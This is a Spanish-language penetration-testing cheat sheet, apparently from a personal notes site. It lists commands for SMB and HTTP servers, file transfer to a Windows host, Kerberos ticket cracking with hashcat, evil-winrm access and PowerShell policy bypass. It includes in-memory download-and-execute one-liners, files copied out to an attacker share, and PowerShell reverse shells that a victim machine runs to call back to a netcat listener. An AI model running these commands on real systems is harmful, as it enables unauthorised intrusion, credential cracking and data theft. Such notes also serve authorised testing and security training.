Servidores temporales
SMB
Servidor SMB en Kali Acceso desde Windows
Se busca el binario de impacket-smbserver:
Copiar > locate smbserver
/usr/bin/impacket-smbserver
/usr/lib/python3/dist-packages/impacket/smbserver.py
/usr/lib/python3/dist-packages/impacket/__pycache__/smbserver.cpython-310.pyc
/usr/share/doc/python3-impacket/examples/smbserver.py
Se sirve una carpeta compartida vía SMB:
Copiar sharedfolder=/tmp/tempserver
mkdir $sharedfolder
cd $sharedfolder
impacket-smbserver share . -smb2support -username xtormin -password xtormin
Se monta la carpeta vía CMD/Powershell:
Copiar net use z: \\192.168.1.100\share /user:xtormin xtormin
Se accede a la carpeta compartida y se descargan los ficheros que se quieran:
Copiar net use \\<IP de Kali>\share /u:xtormin xtormin
copy file.zip \\<IP de Kali>\share\
del file.zip
net use /d \\<IP de Kali>\share
HTTP
HFS
https://www.rejetto.com/hfs/
Se ejecuta el binario hfs.exe descargado desde la interfaz gráfica y se añaden los ficheros que se deseen exponer en el servidor web.
Python
Copiar python3 -m http.server 8000
Transferencia de ficheros
Linux
Copiar wget https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1
Windows
Copiar iwr https://192.168.1.110/winPEASx64.exe -outputfile winpeas64.exe
IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5:8000/Azure-ADConnect.ps1')
> Descarga de repositorios
En ocasiones, el navegador puede bloquear la descarga de ficheros que identifica como maliciosos. Una forma de descargarlos cuando es usando Git con su versión portable cuando no se pueda instalar o no se cuente con permisos de administrador local.
Git
https://git-scm.com/download/win/
Copiar cd PortableGit-2.46.2-64-bit
.\git-bash.exe
Esto abrirá una consola desde la que se podrá clonar el repositorio:
Copiar cd c/Pentest/Tools
git clone https://github.com/PowerShellMafia/PowerSploit.git
Cracking
Ticket de kerberos
Copiar hashcat -m 18200 hash/svc-test.hc18200 /usr/share/wordlists/rockyou.txt --force
Conexión remota
Windows
Copiar evil-winrm -i 192.168.1.100 -u <usuario> -p <contraseña>
Habilitar ejecución de scripts
El siguiente comando permite modificar la política de PowerShell de forma que se permita la ejecución de todos los scripts sin firmar y sin aplicar restricciones ni advertencias (-exec bypass). Además, no se carga el perfil del usuario, lo que permite evadir posibles restricciones (-nop).
Copiar powershell -nop -exec bypass
Reverse shell
Desde la máquina atacante:
Copiar C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443
Desde la máquina víctima:
Copiar powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://192.168.1.100/Invoke-PowerShellTcp.ps1'));Power -Reverse -IPAddress 192.168.1.100 -Port 443
powershell.exe iex (iwr http://192.168.1.100/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 192.168.1.100 -Port 443
Agregar excepción en el firewall
Última actualización hace 4 meses